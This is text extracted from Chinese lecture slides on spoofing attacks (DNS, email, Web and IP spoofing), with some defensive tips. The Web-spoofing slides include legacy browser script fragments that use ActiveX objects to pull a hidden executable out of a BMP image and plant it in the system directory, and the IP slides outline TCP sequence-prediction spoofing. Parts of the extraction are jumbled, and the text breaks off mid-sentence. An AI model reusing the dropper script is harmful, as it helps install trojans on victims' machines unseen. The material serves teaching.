网络安全之欺骗攻击

网络安全之欺骗攻击第1页，共23页。第6章程序攻击重点回顾逻辑炸弹攻击植入后门病毒攻击特洛伊木马攻击其它程序攻击第2页，共23页。第7章欺骗攻击欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击方式有：DNS欺骗攻击；Email欺骗攻击；Web欺骗攻击和IP欺骗攻击等。本章介绍这些主要欺骗攻击的原理、实现技术。第3页，共23页。第7章欺骗攻击7.1DNS欺骗攻击7.2Email欺骗攻击7.3Web欺骗攻击7.4IP欺骗攻击第4页，共23页。DNS欺骗攻击DNS原理741781第7章第1节第5页，共23页。 DNS欺骗攻击DNS欺骗原理假设当提交给某个域名服务器的域名解析请求的数据包被截获，然后按截获者的意图将一个虚假的IP地址作为应答信息返回给请求者，这时，原始请求者就会把这个虚假的IP地址作为它所要请求的域名而进行连接，显然它被欺骗到了别处而根本连接不上自己想要连接的那个域名

对那个客户想要连接的域名而言，它就算是被黑掉了，因为客户由于无法得到它的正确的IP地址而无法连接上它第7章第1节第6页，共23页。DNS欺骗攻击DNS欺骗74178165第7章第1节第7页，共23页。Email欺骗攻击Email欺骗方法攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序

第7章第2节第8页，共23页。Email欺骗攻击Email欺骗实现步骤SMTP服务器允许匿名登录填写假的名称和发信人地址使用web形式骗取密码，或者使用附件植入木马第7章第2节第9页，共23页。Email欺骗攻击Email欺骗的防护查看邮件原文，检查真正的发件服务器地址通过邮件链接网页的时候，注意真正的网站地址在不同的应用中，尽可能使用不相同的、无关的密码第7章第2节第10页，共23页。Web欺骗攻击Web欺骗攻击原理攻击者通过伪造某个WWW站点的影像拷贝，使该Web的入口进入到攻击者的Web影像服务器，并经过攻击者机器的过滤作用，从而达到攻击者监控受攻击者的任何活动以获取有用信息的目的第7章第3节第11页，共23页。Web欺骗攻击Web欺骗方法改写URLWeb中的脚本第7章第3节第12页，共23页。Web欺骗攻击改写URL①emailwithhtmllinksseemslikeMicrosoft①②②/③③④④htmlpagewithlinkslike:⑤⑤htmlpagewithlinkslike:/第7章第3节第13页，共23页。Web欺骗攻击利用Web脚本进行欺骗原理攻击者设计一个网页，并诱使受害者浏览该网页该网页中包含有一个图片和一个脚本当浏览时，该图片被下载到受害者计算机的临时目录中，而脚本被运行脚本的功能是将图片中隐藏的木马提取出来，并设置为自动执行第7章第3节第14页，共23页。Web欺骗攻击利用Web脚本进行欺骗基本控件a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();reg=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO=a1.GetObject();第7章第3节第15页，共23页。7.3Web欺骗攻击Web脚本从BMP图片中释放程序setLt=FSO.CreateTextFile(path&"tmp.in")Lt.WriteLine("rbx")Lt.WriteLine("0")Lt.WriteLine("rcx")Lt.WriteLine("1000")Lt.WriteLine("w136")Lt.WriteLine("q")Lt.Close第16页，共23页。Web欺骗攻击Web脚本从BMP图片中释放程序WSH.Run"command/cdebug"&path&"tmp.dat<"&path&"tmp.in>"&path&"tmp.out",false,6OnErrorResumeNextFSO.GetFile(path&"tmp.dat").Copy(winsys&"tmp.exe")FSO.GetFile(path&"tmp.dat").DeleteFSO.GetFile(path&"tmp.in").DeleteFSO.GetFile(path&"tmp.out").Delete第7章第3节第17页，共23页。Web欺骗攻击Web欺骗的防护很隐蔽，不容易被发现预防手段禁止浏览器中的JavaScript功能确保浏览器的连接状态是可见的时刻注意所点击的URL链接会在位置状态行中得到正确的显示第7章第3节第18页，共23页。IP欺骗攻击IP欺骗的基础通过伪造IP地址能够获得更过的收益或者权限伪造的IP地址可以被接受而不被发现第7章第4节第19页，共23页。IP欺骗攻击IP欺骗的过程信任SYNxSYNy+ACKx+1ACKy+1第7章第4节第20页，共23页。IP欺骗攻击IP欺骗的过程首先使被信任主机的网络暂时瘫痪连接到目标机的某个端口来猜测ISN基值和增加规律

把源址址伪装成被信任主机，发送带有SYN标志的数据段请求连接等待目标机发送SYN+ACK包给已经瘫痪的主机再次伪装成被信任主机向目标机发送的ACK，此时发送的数据段带有预测的目标机的ISN+1连接建立，发送命令请求第7章第4节第21页，共23页。IP欺骗攻击IP欺骗的预防删除/etc/hosts.equiv，